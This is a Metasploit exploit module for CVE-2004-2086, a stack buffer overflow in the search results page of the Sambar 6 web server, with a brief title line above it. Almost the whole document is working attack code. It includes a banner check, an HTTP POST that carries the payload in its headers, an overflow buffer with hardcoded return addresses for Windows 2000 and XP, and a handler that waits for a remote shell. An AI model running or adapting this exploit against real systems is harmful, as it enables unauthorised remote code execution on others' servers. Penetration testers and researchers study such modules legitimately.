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Sambar 6 Search Results Buffer Overflow

Sambar 6 Search Results Buffer Overflow in /search/results.stm application, causes server to di

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##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'		=> 'Sambar 6 Search Results Buffer Overflow',
      'Description'	=> %q{
      This module exploits a buffer overflow found in the
      /search/results.stm application that comes with Sambar 6.
      This code is a direct port of Andrew Griffiths's SMUDGE
      exploit, the only changes made were to the nops and payload.
      This exploit causes the service to die, whether you provided
      the correct target or not.
      },
      'Author' 	=> 	[
          'hdm',
          'Andrew Griffiths <andrewg[at]felinemenace.org>',
          'aushack', # msf3 port
            ],
      'Arch'		=> [ ARCH_X86 ],
      'License'       => MSF_LICENSE,
      'References'    =>
      [
        [ 'CVE', '2004-2086' ],
        [ 'OSVDB', '5786' ],
        [ 'BID', '9607' ],
      ],
      'Privileged'		=> false,
      'DefaultOptions'	=>
      {
        'EXITFUNC'	=> 'thread',
      },
      'Payload'		=>
        {
          'Space'			=> 2000, # unlimited
          'BadChars' 		=> "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
          'StackAdjustment' 	=> -3500,
        },
      'Platform' => ['win'],
      'Targets'  =>
      [
        # patrick tested OK 20100214 xpsp0
        ['Windows 2000', 	{ 'jmpESP' => 0x74fdee63, 'Ret' => 0x773368f4 } ],
        ['Windows XP',   	{ 'jmpESP' => 0x77da78ff, 'Ret' => 0x77e631ea } ], # user32.dll jmp esp; kernel32.dll retn

      ],
      'DisclosureDate' => '2003-06-21'))

      register_options(
      [
        Opt::RPORT(80),
      ])
  end

  def check
    connect
    sock.put("GET / HTTP/1.0\r\n\r\n")
    banner = sock.get_once
    disconnect

    if (banner =~ /Server:\sSAMBAR/)
      return Exploit::CheckCode::Detected
    end
      return Exploit::CheckCode::Safe
  end

  def exploit
    connect

    buff = "POST /search/results.stm HTTP/1.1\r\n"
    buff << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"
    buff <<  "User-Agent: #{payload.encoded}\r\n"
    buff << "Accept: #{payload.encoded}\r\n"
    buff << "Accept-Encoding: #{payload.encoded}\r\n"
    buff << "Accept-Language: #{payload.encoded}\r\n"
    buff << "Accept-Ranges: #{payload.encoded}\r\n"
    buff << "Referrer: #{payload.encoded}\r\n"
    buff << "Connection: Keep-Alive\r\n"
    buff <<"Pragma: no-cache\r\n"
    buff << "Content-Type: #{payload.encoded}\r\n"

    # we use \xfc (cld) as nop, this code goes through tolower() and must be 0xc0->0xff
    # int3's DO NOT WORK because it triggers an exception and causes the server to exit
    jmpcode = "\xfc" + "h" + [target['Ret']].pack('V') + "\xfc\xfc\xfc" + "\xc2\x34\xd1"
    bigbuff = jmpcode  + ("X" * (128 - jmpcode.length)) + [target['jmpESP']].pack('V') +[target['jmpESP']].pack('V') + jmpcode
    content = "style=page&spage=0&indexname=docs&query=#{bigbuff}"
    buff << "Content-Length: #{content.length}\r\n\r\n" + content

    print_status("Sending #{buff.length} bytes to remote host.")
    sock.put(buff)
    res = sock.get_once
    if (!res)
      print_status("Didn't get response, hoping for shell anyway...")
    else
      print_status("Got Response!")
    end

    handler
    disconnect
  end
end

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